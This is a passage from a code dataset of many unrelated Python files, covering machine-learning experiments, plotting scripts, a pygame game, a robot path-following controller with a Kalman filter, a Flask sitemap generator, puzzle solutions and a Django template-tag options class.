2.3635379592577617 mins","sub_path":"src/parser_useless/xmlCleaner.py","file_name":"xmlCleaner.py","file_ext":"py","file_size_in_byte":11198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"189072420","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sklearn\nfrom sklearn import metrics\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import classification_report\nfrom sklearn.model_selection import train_test_split, cross_val_score\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.model_selection import cross_val_score\n\ndataframe = pd.read_excel('D:\\pythonProject2\\clinical_dataset.xlsx')\ndata = dataframe.columns.values.tolist()\ndf = dataframe[data[0:9]]\ndf = (df - df.min()) / (df.max() - df.min())\n\ndata2 = df.values\nX = data2[:, 0:9]\ny = dataframe['Status']\nY = []\nfor i in y:\n if (i == \"healthy\"):\n Y.append(0)\n else:\n Y.append(1)\nY = np.array(Y)\n\nhidden_layer = [50, 500, 1000]\nX2 = np.array(X)\nY2 = np.array(Y)\nfor i in hidden_layer:\n ANNModel = MLPClassifier(hidden_layer_sizes=[i, i], activation='logistic', solver='lbfgs', random_state=1,\n alpha=0.1, max_iter=200)\n cv = sklearn.model_selection.KFold(n_splits=10, shuffle=True, random_state=1)\n scores = cross_val_score(ANNModel, X2, Y2, cv=cv)\n print(\"Accuracy: %0.2f (+/- %0.2f)\" % (i, scores.mean()))\n\ntree_num = [20, 500, 10000]\nX3 = np.array(X)\nY3 = np.array(Y)\nfor j in tree_num:\n ForestModel = RandomForestClassifier(n_estimators=j, min_samples_split=5, bootstrap=True)\n cv = sklearn.model_selection.KFold(n_splits=10, shuffle=True, random_state=1)\n scores2 = cross_val_score(ForestModel, X3, Y3, cv=cv)\n print(\"Accuracy: %0.2f (+/- %0.2f)\" % (j, scores2.mean()))\n\n","sub_path":"Forest4.py","file_name":"Forest4.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"477253040","text":"\"\"\"Calculates the mean difference between the depth of the sentence in the\ngold standard parses and the prediced model parses\"\"\"\nimport numpy as np\n\n# get the gold standard tree depths from the gold standard parses\nGOLD_DEPTH = []\nfor line in open(\"gold_parses_tree_depth.txt\", \"r\"):\n line = line.strip()\n max_depth = 0\n n_open = 0\n n_closed = 0\n # maximum depth = maximum difference between open and closed parentheses counts\n for char in line:\n if char == \"(\":\n n_open += 1\n if char == \")\":\n n_closed += 1\n if n_open - n_closed > max_depth:\n max_depth = n_open - n_closed\n GOLD_DEPTH.append(max_depth)\n\n# get the test sentence depths\nTEST_DEPTH = []\nsent_num = -1\nsentences = {}\nfor line in open(\"bllip_tree_depth.txt\", \"r\"):\n line = line.split(\"\\t\")\n # we take this to be the border between two sets of particle parses and weights\n if len(line) < 2:\n sent_num += 1\n # if we have collected a set of particle parses, sort them by probability and take the most probable\n if sentences:\n line = [k for k, v in sorted(sentences.items(), key=lambda x : x[1])][-1]\n max_depth = 0\n n_open = 0\n n_closed = 0\n # calculate the depth of the most probable parse as we did for the gold standard ones\n for char in line:\n if char == \"(\":\n n_open += 1\n if char == \")\":\n n_closed += 1\n if n_open - n_closed > max_depth:\n max_depth = n_open - n_closed\n TEST_DEPTH.append(max_depth)\n sentences = {}\n # if we haven't reached a break yet, store the particle and its weight\n else:\n sentences[line[0]] = float(line[1])\n\n#calculate the differences between the gold and test depth\nDIFFERENCES = np.asarray([GOLD_DEPTH[i]-TEST_DEPTH[i] for i in range(len(GOLD_DEPTH))])\n\nprint(f\"On average, gold parses are {np.mean(DIFFERENCES)} deeper than predicted parses (stderr = {np.std(DIFFERENCES)/np.sqrt(len(DIFFERENCES))})\")\n\n\n","sub_path":"analysis/tree_depth/tree_depth.py","file_name":"tree_depth.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"412536896","text":"\"\"\"\nUtility to get the date of meetups.\nWritten by Bede Kelly for Exercism.\n\"\"\"\nimport datetime\nfrom calendar import monthrange\n__author__ = \"Bede Kelly\"\n\ndef meetup_day(year, month, weekday, selector):\n \"\"\"Returns the date of a meetup.\"\"\"\n teenth_days = range(13, 20) # 20th not included.\n weekdays = [\"Mon\", \"Tues\", \"Wednes\", \"Thurs\", \"Fri\", \"Satur\", \"Sun\"]\n weekdays = [i + \"day\" for i in weekdays]\n if selector == \"teenth\":\n for day in teenth_days:\n date = datetime.date(year, month, day)\n if weekday == weekdays[date.weekday()]:\n return date\n else:\n selectors = {\n \"1st\": 0,\n \"2nd\": 1,\n \"3rd\": 2,\n \"4th\": 3,\n \"last\": -1\n }\n index = selectors[selector]\n number_days = monthrange(year, month)[1]\n dates_range = range(1, number_days+1)\n\n all_dates = [datetime.date(year, month, day) for day in dates_range]\n possible_dates = [d for d in all_dates\n if d.weekday() == weekdays.index(weekday)]\n return datetime.date(year, month, possible_dates[index].day)\n","sub_path":"all_data/exercism_data/python/meetup/b0832682e654426faad06b7964bde2be.py","file_name":"b0832682e654426faad06b7964bde2be.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"87966006","text":"import pygame\nimport text_input as ti\nfrom sprites import *\nfrom settings import *\nfrom functions import *\nfrom pygame.locals import *\n\nimport class_textDisplay as textDisplay\ntext = textDisplay.TextDisplay()\n\n# Import needed to center PyGame's window\nimport os\n# Code to center PyGame window on the screen\nos.environ['SDL_VIDEO_CENTERED'] = '1'\n\n# INITIALIZING\n# ==============================================================================\n# PyGame initialization:\npygame.init()\npygame.display.set_caption(windowTitle)\n\n# Screen settings:\nscreen = pygame.display.set_mode(screen_size, 0, 32)\n\n# Setting up FPS:\nclock = pygame.time.Clock()\n\n# Player walk setting:\nspriteCount = 0\n\n# Bomb settings:\nbomb = bomb_crash\n\n# MAIN LOOP\n# ==============================================================================\nrunning = True\nwhile running:\n # Sets game FPS:\n clock.tick(framesPerSecond)\n\n # Main screen:\n if game_screen == \"Main Screen\":\n # Loops through game events\n for event in pygame.event.get():\n # If event is QUIT (Window close)\n if event.type == QUIT:\n # Sets playing state to false, thus quitting the main loop\n running = False\n\n if event.type == pygame.MOUSEBUTTONDOWN:\n if start_button.buttonClick():\n game_screen = \"Player 1 Name\"\n\n if settings_button.buttonClick():\n pass\n\n if exit_button.buttonClick():\n running = False\n\n # Drawing the background:\n screen.fill(GRAY)\n button_group.draw(screen)\n\n text.displayTextMainMenu(\"Avengers\", WHITE, screen, screen_size, \"top_center2\")\n\n # Updates stuff:\n pygame.display.update()\n\n # Player 1 name screen:\n elif game_screen == \"Player 1 Name\":\n\n # Getting game's events:\n events = pygame.event.get()\n # Loops through game events\n for event in events:\n # If event is QUIT (Window close)\n if event.type == QUIT:\n # Sets playing state to false, thus quitting the main loop\n running = False\n\n # Checks if there was a key press:\n if event.type == pygame.KEYDOWN:\n # Checks if the key pressed was the ENTER key:\n if event.key == pygame.K_RETURN:\n # Only proceeds if the player typed something:\n if len(player_1.name) != 0:\n # Changes screen:\n game_screen = \"Player 2 Name\"\n\n # Drawing the background:\n screen.fill(GRAY)\n\n # Displaying basic text:\n text.displayTextNameScreen(\"Please input player's 1 name (Press ENTER when ready):\",\n WHITE, screen, screen_size, \"center_top3\")\n\n # Displaying and getting player's name:\n player_1.name = ti.textInputBox(player_1.name, WHITE,\n screen, screen_size, events, text.font_36)\n\n # Updates stuff:\n pygame.display.update()\n\n # Player 2 name screen:\n elif game_screen == \"Player 2 Name\":\n\n # Getting game's events:\n events = pygame.event.get()\n # Loops through game events\n for event in events:\n # If event is QUIT (Window close)\n if event.type == QUIT:\n # Sets playing state to false, thus quitting the main loop\n running = False\n\n # Checks if there was a key press:\n if event.type == pygame.KEYDOWN:\n # Checks if the key pressed was the ENTER key:\n if event.key == pygame.K_RETURN:\n # Only proceeds if the player typed something:\n if len(player_2.name) != 0:\n # Changes screen:\n game_screen = \"Playing\"\n\n # Drawing the background:\n screen.fill(GRAY)\n\n # Displaying basic text:\n text.displayTextNameScreen(\"Please input player's 2 name (Press ENTER when ready):\",\n WHITE, screen, screen_size, \"center_top3\")\n\n # Displaying and getting player's name:\n player_2.name = ti.textInputBox(player_2.name, WHITE,\n screen, screen_size, events, text.font_36)\n\n # Updates stuff:\n pygame.display.update()\n\n # Playing screen:\n elif game_screen == \"Playing\":\n\n # Checking for collisions with the terrain:\n if terrainCollision == True:\n if pygame.sprite.spritecollide(player_1, terrain.terrain_group, False):\n player_1.rect.y -= 4\n player_1.standing = True\n\n else:\n player_1.standing = False\n\n if pygame.sprite.spritecollide(player_2, terrain.terrain_group, False):\n player_2.rect.y -= 4\n player_2.standing = True\n\n else:\n player_2.standing = False\n\n if pygame.sprite.spritecollide(bomb, terrain.terrain_group, True):\n bomb.rect.y += 10\n if pygame.sprite.spritecollide(bomb, terrain.terrain_group, True):\n lastBombPosition = bomb.rect.center\n bombHit = True\n bomb.stop_movement()\n\n # Gets mouse position:\n mousePosition = pygame.mouse.get_pos()\n\n # Checking for pressed keys:\n pressed_keys = pygame.key.get_pressed()\n\n # Loops through game events\n for event in pygame.event.get():\n # If event is QUIT (Window close)\n if event.type == QUIT:\n # Sets playing state to false, thus quitting the main loop\n running = False\n\n # Checks if there was a mouse button press:\n if event.type == pygame.MOUSEBUTTONDOWN:\n if bomb.moving == False:\n if playerTurn == \"1\":\n # Gets bomb's stats and launches it:\n getBombStats(bomb, player_1, mousePosition)\n # Sets the current play as not done yet:\n done = False\n\n elif playerTurn == \"2\":\n # Gets bomb's stats and launches it:\n getBombStats(bomb, player_2, mousePosition)\n # Sets the current play as not done yet:\n done = False\n\n # Checks if there was a key press:\n if event.type == pygame.KEYDOWN:\n # Checks if the key pressed was the number 1:\n if event.key == pygame.K_1:\n if bomb.moving == False:\n bomb = bomb_crash\n bomb_group.empty()\n bomb_group.add(bomb_crash)\n\n # Checks if the key pressed was the number 2:\n if event.key == pygame.K_2:\n if bomb.moving == False:\n bomb = bomb_pokeball\n bomb_group.empty()\n bomb_group.add(bomb_pokeball)\n\n # Checks if the key pressed was the number 3:\n if event.key == pygame.K_3:\n if bomb.moving == False:\n bomb = bomb_purpleball\n bomb_group.empty()\n bomb_group.add(bomb_purpleball)\n\n # Checks if the key pressed was the number 4:\n if event.key == pygame.K_4:\n if bomb.moving == False:\n bomb = bomb_crazy\n bomb_group.empty()\n bomb_group.add(bomb_crazy)\n\n # Checks if the key pressed was the number 5:\n if event.key == pygame.K_5:\n if bomb.moving == False:\n bomb = bomb_neutron\n bomb_group.empty()\n bomb_group.add(bomb_neutron)\n\n # Players turn:\n if playerTurn == \"1\":\n # If pressed key is D:\n if pressed_keys[K_d] and not bomb.moving:\n player_1.move(\"right\")\n # If pressed key is A:\n if pressed_keys[K_a] and not bomb.moving:\n player_1.move(\"left\")\n\n # Drawing the line between player and mouse position:\n get_distance(player_1.rect.center, mousePosition)\n pygame.draw.line(screen, INFINANCE, player_1.rect.center, mousePosition, 5)\n\n # Checks for collision, if theres is any, stops bomb movement and\n # does damage to the enemy:\n if pygame.sprite.collide_rect(bomb, player_2):\n lastBombPosition = bomb.rect.center\n bombHit = True\n bomb.stop_movement()\n player_2.health -= bomb.damage\n # Checks if there is a winner\n if player_2.health <= 0:\n player_2.health = 0\n winner = player_1.name\n loser = player_2.name\n game_screen = \"Winner Screen\"\n\n if done == False:\n if bomb.moving == False:\n bomb.reset_stats()\n bomb_group, bomb = reset_bomb(bomb_group, bomb_crash)\n playerTurn = \"2\"\n done = True\n player_1.movements = 0\n\n elif playerTurn == \"2\":\n # If pressed key is RIGHT arrow:\n if pressed_keys[K_RIGHT] and not bomb.moving:\n player_2.move(\"right\")\n # If pressed key is LEFT arrow:\n if pressed_keys[K_LEFT] and not bomb.moving:\n player_2.move(\"left\")\n\n # Drawing the line between player and mouse position:\n get_distance(player_1.rect.center, mousePosition)\n pygame.draw.line(screen, INFINANCE, player_2.rect.center, mousePosition, 5)\n\n # Checks for collision, if theres is any, stops bomb movement and\n # does damage to the enemy:\n if pygame.sprite.collide_rect(bomb, player_1):\n lastBombPosition = bomb.rect.center\n bombHit = True\n bomb.stop_movement()\n player_1.health -= bomb.damage\n # Checks if there is a winner\n if player_1.health <= 0:\n player_1.health = 0\n winner = player_2.name\n loser = player_1.name\n game_screen = \"Winner Screen\"\n\n if done == False:\n if bomb.moving == False:\n bomb.reset_stats()\n bomb_group, bomb = reset_bomb(bomb_group, bomb_crash)\n playerTurn = \"1\"\n done = True\n player_2.movements = 0\n\n # Drawing the background:\n screen.blit(background.image, (0, 0))\n\n # Draws the terrain:\n terrain.terrain_group.draw(screen)\n\n # Draws the action bar:\n actionBar_group.draw(screen)\n\n # Draws bomb selection indicator:\n if showBombSelector == True:\n if bomb.name == \"crash\":\n selectorPos = (round(actionBar.slot1[0]), round(actionBar.slot1[1]))\n selectorRadius = round(actionBar.rect.height/2.5)\n pygame.draw.circle(screen, BLUE, selectorPos, selectorRadius, 2)\n\n elif bomb.name == \"pokeball\":\n selectorPos = (round(actionBar.slot2[0]), round(actionBar.slot2[1]))\n selectorRadius = round(actionBar.rect.height/2.5)\n pygame.draw.circle(screen, BLUE, selectorPos, selectorRadius, 2)\n\n elif bomb.name == \"purpleball\":\n selectorPos = (round(actionBar.slot3[0]), round(actionBar.slot3[1]))\n selectorRadius = round(actionBar.rect.height/2.5)\n pygame.draw.circle(screen, BLUE, selectorPos, selectorRadius, 2)\n\n elif bomb.name == \"crazy\":\n selectorPos = (round(actionBar.slot4[0]), round(actionBar.slot4[1]))\n selectorRadius = round(actionBar.rect.height/2.5)\n pygame.draw.circle(screen, BLUE, selectorPos, selectorRadius, 2)\n\n elif bomb.name == \"neutron\":\n selectorPos = (round(actionBar.slot5[0]), round(actionBar.slot5[1]))\n selectorRadius = round(actionBar.rect.height/2.5)\n pygame.draw.circle(screen, BLUE, selectorPos, selectorRadius, 2)\n\n # Drawing the players:\n players_group.draw(screen)\n\n # Drawing the bomb:\n if bomb.moving == True:\n bomb_group.draw(screen)\n\n # Drawing the explosion:\n if bombHit == True:\n explosion.animate(lastBombPosition)\n if explosion.displayNumber == 12:\n bombHit = False\n explosion_group.draw(screen)\n\n # Displaying names and health:\n text.displayHealthAndName(WHITE, player_1, screen, screen_size)\n text.displayHealthAndName(WHITE, player_2, screen, screen_size)\n\n # Displaying movements left:\n if playerTurn == \"1\":\n text.displayMovementsLeft(WHITE, screen, 30 - player_1.movements)\n elif playerTurn == \"2\":\n text.displayMovementsLeft(WHITE, screen, 30 - player_2.movements)\n\n # Displaying bomb's speed and angle:\n if playerTurn == \"1\":\n speed = round(get_distance(player_1.rect.center, mousePosition), 2)\n if speed > bomb.maxSpeed:\n speed = bomb.maxSpeed\n angle = round(get_angle(player_1.rect.center, mousePosition, \"degrees\"), 2)\n text.displayDistance(WHITE, screen, speed, angle, mousePosition)\n elif playerTurn == \"2\":\n speed = round(get_distance(player_2.rect.center, mousePosition), 2)\n if speed > bomb.maxSpeed:\n speed = bomb.maxSpeed\n angle = round(get_angle(player_2.rect.center, mousePosition, \"degrees\"), 2)\n text.displayDistance(WHITE, screen, speed, angle, mousePosition)\n\n # Updates stuff:\n bomb.update()\n player_1.gravityFall()\n player_2.gravityFall()\n pygame.display.update()\n\n # Winner's screen:\n elif game_screen == \"Winner Screen\":\n # Loops through game events\n for event in pygame.event.get():\n # If event is QUIT (Window close)\n if event.type == QUIT:\n # Sets playing state to false, thus quitting the main loop\n running = False\n\n # Checks if there was a key press:\n if event.type == pygame.KEYDOWN:\n # Checks if the key pressed was the ENTER key:\n if event.key == pygame.K_RETURN:\n # Resets player's health:\n player_1.resetPlayer()\n player_2.resetPlayer()\n\n # Changes screen:\n game_screen = \"Main Screen\"\n\n # Drawing the background:\n screen.fill(GRAY)\n\n # Displaying basic text:\n text.displayTextWinnerScreen(\"Congratulations!\",\n WHITE, screen, screen_size, \"center_top3\")\n # Displaying who won:\n text.displayWhoWon(GREEN, winner, loser, screen, screen_size,\n \"center_top\")\n\n # Updates stuff:\n pygame.display.update()\n\n\n# Quits the game:\npygame.display.quit()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"475572242","text":"import csv\r\nimport matplotlib.pyplot as plt\r\nfrom datetime import datetime\r\nfile_name ='C:/Users/Ismail/Python Challange/Data Scienc/Python Crash Courses/Day Three/haye.csv'\r\n\r\n## opening the file \r\nwith open(file_name) as file_object :\r\n weather_data = csv.reader(file_object)\r\n headers = next(weather_data)\r\n print(headers)\r\n\r\n## Print the index and the value of the headers \r\n\r\nfor index, values in enumerate(headers):\r\n print(index,values)\r\n\r\n### Printing the temperature data\r\ntemperature =[]\r\nwith open (file_name) as file_object:\r\n data_holder = csv.reader(file_object)\r\n header_row= next(data_holder)\r\n\r\n for row in data_holder:\r\n temperature_col = row[6]\r\n temperature.append(temperature_col)\r\n print(temperature)\r\n\r\n##ploting the temperature data \r\n\r\nfig,ax = plt.subplots()\r\nax.set_title(\"July Temperature\")\r\nax.set_ylabel(\"Temperature\")\r\nax.plot(temperature)\r\n##plt.show()\r\n\r\n## Reading the dates\r\n\r\nDates =[]\r\n\r\nwith open(file_name) as dates :\r\n taarikh = csv.reader(dates)\r\n header = next(taarikh)\r\n\r\n for i in taarikh :\r\n date_col = i[3]\r\n Dates.append(date_col)\r\n print(Dates)\r\n\r\n##plot the date \r\nfig,ax = plt.subplots()\r\nax.set_title(\"July Month\")\r\nax.plot(Dates,Dates)\r\n##plt.show()\r\n\r\nplt.style.use(\"seaborn\")\r\nfig,ax = plt.subplots()\r\nax.plot(Dates,temperature)\r\nplt.title(\" Daily temperatures in July\")\r\nplt.xlabel('',fontsize=12)\r\nfig.autofmt_xdate()\r\nplt.ylabel(\"Temperature\")\r\nplt.show()","sub_path":"Python Crash Courses/Day Three/weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"225802056","text":"import pathlib\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport glob\nfile_dir = 'all_8000_outliers/isotherm/new_isotherm/'\nlist_files=(glob.glob(file_dir + \"*.csv\"))\npc_file = open(file_dir + 'pc_structures.txt', 'w')\nfor a in list_files:\n print(a)\n raw_dataset = pd.read_csv(a)\n structure_name = a.split('.')[0]\n # if the files are in a different directory, need to eliminate the pre-string\n if (\"\\\\\" in structure_name):\n structure_name=structure_name.split('\\\\')[len(structure_name.split('\\\\')) - 1]\n print(structure_name)\n raw_dataset = raw_dataset.sort_values(by = ['Pres'])\n plot_limit_y = max(raw_dataset['Loading'])\n plot_limit_x = max(raw_dataset['Pres']/1e5)\n plt.figure(figsize = (12,10), dpi = 800)\n plt.text(0.05*plot_limit_x,0.95*plot_limit_y, \"Testing Data:\" + structure_name,\n fontsize = 20)\n plt.plot(raw_dataset['Pres']/1e5, raw_dataset['Loading'], '-bo')\n plt.ylabel(r\"GCMC Loading [cm$^{\\rm 3}$/cm$^{\\rm 3}$]\", fontsize = 20)\n plt.xlabel('Pressure [Bar]', fontsize = 20)\n plt.xticks(fontsize = 20)\n plt.yticks(fontsize = 20)\n plt.savefig(file_dir + \"Isotherm_\" + structure_name + \".png\")\n plt.clf()\n # also detect the largest step change in the isotherms\n for b in range(0, raw_dataset.shape[0]-1):\n sort_dataset = raw_dataset.sort_values(by='Pres', ascending=True).reset_index(drop = True)\n change_loading = sort_dataset['Loading'][b + 1] - sort_dataset['Loading'][b]\n if (b == 0):\n stored_loading = change_loading\n stored_index = b\n else:\n if (change_loading > stored_loading):\n stored_loading = change_loading\n stored_index = b\n print(sort_dataset['Loading'][stored_index], sort_dataset['Loading'][stored_index+1])\n pc_file.write(\"%s, %i, %i, %.2f\\n\" % (str(sort_dataset['MOF'][stored_index]), \n sort_dataset['Pres'][stored_index], \n sort_dataset['Pres'][stored_index + 1],\n (sort_dataset['Pres'][stored_index] + sort_dataset['Pres'][stored_index + 1])/2))\n\npc_file.close()","sub_path":"Outlier_stuff_isotherm_analysis/plot_isotherm.py","file_name":"plot_isotherm.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"455853037","text":"from GestionFichiers import *\nfrom FonctionsEssaisVitesseLineaire import *\n\nrho_max = 250\nv_max = 130 / 3.6\nlongueurSegment = 100000\ndureeExperience = 900\nfacteur = 1 + 1e-2\nnbPointsEspace = 25000\ndeltaX = longueurSegment / nbPointsEspace\ndeltaT = deltaX * (1 / (facteur * v_max))\nnbPointsTemps = int(dureeExperience / deltaT)\n\nrho = [rho0(i * deltaX, longueurSegment) for i in range(nbPointsEspace)]\n\nnettoyage(\"results/essaisVitesseLineaire/config/\")\nnettoyage(\"results/essaisVitesseLineaire/calculs/\")\n\necrireParametresDansUnFichier(\"results/essaisVitesseLineaire/config/config.txt\", longueurSegment, dureeExperience, nbPointsEspace, deltaX, deltaT, nbPointsTemps, v_max, rho_max, facteur)\necrireListeDansUnFichier(rho, \"results/essaisVitesseLineaire/calculs/0.txt\")\n\ntemps = 0\n\nfor i in range(1, nbPointsTemps):\n temps = temps + deltaT\n rho = calcul(rho, deltaT, deltaX, v_max, rho_max)\n ecrireListeDansUnFichier(rho, \"results/essaisVitesseLineaire/calculs/\" + str(i) + \".txt\")\n","sub_path":"Vitesse_essai_lineaire/RemplirEssaisVitesseLinaire.py","file_name":"RemplirEssaisVitesseLinaire.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"106883380","text":"def exam27():\n T=int(input())\n for t in range(T):\n n=int(input())\n t=input().split(\" \")\n arr=[]\n out=[]\n out.append(-1)\n for item in t:\n arr.append(int(item))\n for i in range(1,n):\n pre=-1\n for j in range(i):\n if arr[j] math.pi:\n eta -= math.copysign(2*math.pi,eta)\n\ndef true_mes():\n global true_w,prev_pos\n true_w = pos[2] - prev_pos[2]\n prev_pos = np.copy(pos)\n if true_w > 3.0:\n true_w -= 2*math.pi\n if true_w < -3.0:\n true_w += 2*math.pi\n #true_w /= Ts\n true_w /= -nowtime\n\n# Returns Waypoint Index and Distance to Waypoint\ndef waypoint_finder(L1_Dist):\n global pos\n pntarry = pathtree.query_ball_point(pos[:2],L1_Dist, p = 2)\n if not pntarry:\n nL1, waypoint = pathtree.query(pos[:2], k = 1, p = 2)\n else:\n pntarry = np.sort(np.asarray(pntarry))\n pntarry -= wp_num\n waytemp = pntarry[np.where(pntarry>=0)]\n if waytemp.shape[0] == 0:\n waypoint = 0\n else:\n newtemp = np.arange(waytemp[0],waytemp.shape[0]+waytemp[0])\n waypoint = np.amax(np.where(waytemp-newtemp==0))\n waypoint += wp_num\n nL1 = L1_Distance(waypoint) \n return waypoint, nL1\n\ndef animate(i):\n global data, lines\n newdata = np.array([true_w, x_prev[1], pos[2], x_prev[0]])\n if stop != True:\n data = np.append(data, newdata[:,None], axis = 1)\n data = np.delete(data,0,axis = 1)\n for j, line in enumerate(lines):\n line.set_ydata(data[j])\n return lines\n\ndef L1_control_algo():\n global w_cmd, pos, stop, v_cmd, wp_num, nowtime, prevtime, newL1\n\n # Distance ahead of which the waypoint needs to be tracked\n L1 = K_gain*V_norm\n\n # Find the waypoint index at that L1 distance\n # and recompute exact L1 distance\n wp_num, newL1 = waypoint_finder(L1)\n\n #Calculate angle to the waypoint\n Angle(wp_num)\n # print(\"Angle:\",eta)\n # print(\"Waypoint:\",wp_num)\n # print(\"Frame:\", pos[5])\n # print(\"Time delta:\", nowtime)\n\n #Commands:\n if eta > 0.2:\n acc_cmd = (math.sin(eta)*V_norm**2)/newL1\n else:\n acc_cmd = (eta*V_norm**2)/newL1\n # print(\"Sin eta\", math.sin(eta))\n w_cmd = acc_cmd/V_norm**2\n v_cmd = V_norm\n\n # print(\"Omega CMD:\",w_cmd)\n\n\n if newL1<0.01:\n\n print(\"Destination REACHED!!\", newL1)\n stop = 1\n\ndef track_state():\n global untrackcnt, V_norm, w_cmd, v_cmd\n if pos[4] > 0.2:\n untrackcnt = 0\n else:\n untrackcnt += 1\n if untrackcnt>50:\n print(\"UNTRACKED! for {} ms\".format(untrackcnt))\n v_cmd = 0\n w_cmd = 0\n\ndef kalmanfilter():\n global x_prev, P, true_w, nowtime, newL1, R, pos\n\n true_mes()\n\n A = np.array([[1, -nowtime],[0,-nowtime/newL1]])\n x_pred = A.dot(x_prev) + np.array([0, w_cmd])\n\n P_pred = A.dot(P.dot(A.T))\n\n #Update\n if x_pred[0] - pos[2] > 3.0:\n x_pred[0] -= 2*math.pi\n if x_pred[0] - pos[2] < -3.0:\n x_pred[0] += 2*math.pi\n y = np.array([pos[2],true_w]) - x_pred\n\n S = P_pred + R\n K = P_pred.dot(np.linalg.inv(S))\n\n x_new = x_pred + K.dot(y)\n P = (I - K).dot(P_pred)\n\n x_prev = x_new\n\n\n pos[2] = x_prev[0]\n\n # print(\"True Omega:\", true_w)\n # print(\"kalmanfilter Omega:\",x_prev[1])\n # print(\"Angle kalmanfilter:\",ang_est)\n # datastr = \"{},{},{},{},{}\\n\".format(true_w, w_cmd, pos[2], nowtime, newL1)\n # est_store.write(datastr)\n\n\n\n# def filter():\n# pass\n\ndef stop_udp():\n print(\"\\nClosing Ports\\n\")\n for i in range(10000):\n socksend = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\n msg = struct.pack('
/sitemap.xml\", methods=[\"GET\"])\ndef year_sitemap(year):\n \"\"\"Generate sitemap.xml \"\"\"\n pages = ['http://www.revitapidocs.com/{year}/'.format(year=year)]\n templates = os.path.join('app', 'templates', str(year))\n for filename in os.listdir(templates):\n url = 'http://www.revitapidocs.com/{year}/{filename}'.format(year=year,\n filename=filename)\n pages.append(url)\n\n sitemap_xml = render_template('sitemap_template.xml', pages=pages, priority=0.5)\n response = make_response(sitemap_xml)\n response.headers[\"Content-Type\"] = \"application/xml\"\n\n return response\n\n\n@app.route(\"/sitemap.xml\", methods=[\"GET\"])\ndef sitemap():\n \"\"\"Generate sitemap.xml \"\"\"\n pages = ['http://www.revitapidocs.com/',\n 'http://www.revitapidocs.com/2015/',\n 'http://www.revitapidocs.com/2016/',\n 'http://www.revitapidocs.com/2017/',\n 'http://www.revitapidocs.com/python/',\n ]\n\n sitemap_xml = render_template('sitemap_template.xml', pages=pages, priority=1.0)\n response = make_response(sitemap_xml)\n response.headers[\"Content-Type\"] = \"application/xml\"\n\n return response\n","sub_path":"app/seo_response.py","file_name":"seo_response.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"419285917","text":"#!/usr/bin/env python3\n\nimport collections\n\nclass Solution:\n # @param start, a string\n # @param end, a string\n # @param dict, a set of string\n # @return an integer\n def ladderLength(self, start, end, dict):\n if start in dict:\n dict.remove(start)\n dict.add(end)\n if len(start) != len(end):\n return 0\n queue = collections.deque([start])\n m = len(start)\n dist = {start: 0}\n while queue:\n curr = queue.popleft()\n if curr == end:\n return dist[curr] + 1\n curr_list = list(curr)\n for i in range(m):\n head = curr[:i]\n tail = curr[i + 1:]\n for ch in 'abcdefghijklmnopqrstuvwxyz':\n if curr[i] == ch:\n continue\n post = head + ch + tail\n if post not in dict:\n continue\n if post not in dist or post in dist and dist[post] > dist[curr] + 1:\n dist[post] = dist[curr] + 1\n queue.append(post)\n return 0\n\ndef main():\n solver = Solution()\n start = 'hit'\n end = 'cog'\n dict = {'hot', 'dot', 'dog', 'lot', 'log'}\n print(solver.ladderLength(start, end, dict))\n\nif __name__ == '__main__':\n main()\n","sub_path":"python/word_ladder.py","file_name":"word_ladder.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"261483617","text":"from classytags.blocks import BlockDefinition\nfrom classytags.compat import compat_basestring\nfrom classytags.parser import Parser\nfrom classytags.utils import StructuredOptions, get_default_name\nfrom django.template import Node\n\n\nclass Options(object):\n \"\"\"\n Option class holding the arguments of a tag.\n \"\"\"\n def __init__(self, *options, **kwargs):\n self.options = {}\n self.breakpoints = []\n self.combined_breakpoints = {}\n current_breakpoint = None\n last = None\n self.options[current_breakpoint] = []\n self.all_argument_names = []\n for value in options:\n if isinstance(value, compat_basestring):\n if isinstance(last, compat_basestring):\n self.combined_breakpoints[last] = value\n self.breakpoints.append(value)\n current_breakpoint = value\n self.options[current_breakpoint] = []\n else:\n self.options[current_breakpoint].append(value)\n self.all_argument_names.append(value.name)\n last = value\n self.blocks = []\n for block in kwargs.get('blocks', []):\n if isinstance(block, BlockDefinition):\n block_definition = block\n elif isinstance(block, compat_basestring):\n block_definition = BlockDefinition(block, block)\n else:\n block_definition = BlockDefinition(block[1], block[0])\n block_definition.validate(self)\n self.blocks.append(block_definition)\n if 'parser_class' in kwargs:\n self.parser_class = kwargs['parser_class']\n else:\n self.parser_class = Parser\n\n def get_parser_class(self):\n return self.parser_class\n\n def bootstrap(self):\n \"\"\"\n Bootstrap this options\n \"\"\"\n return StructuredOptions(self.options, self.breakpoints, self.blocks, self.combined_breakpoints)\n\n def parse(self, parser, tokens):\n \"\"\"\n Parse template tokens into a dictionary\n \"\"\"\n argument_parser_class = self.get_parser_class()\n argument_parser = argument_parser_class(self)\n return argument_parser.parse(parser, 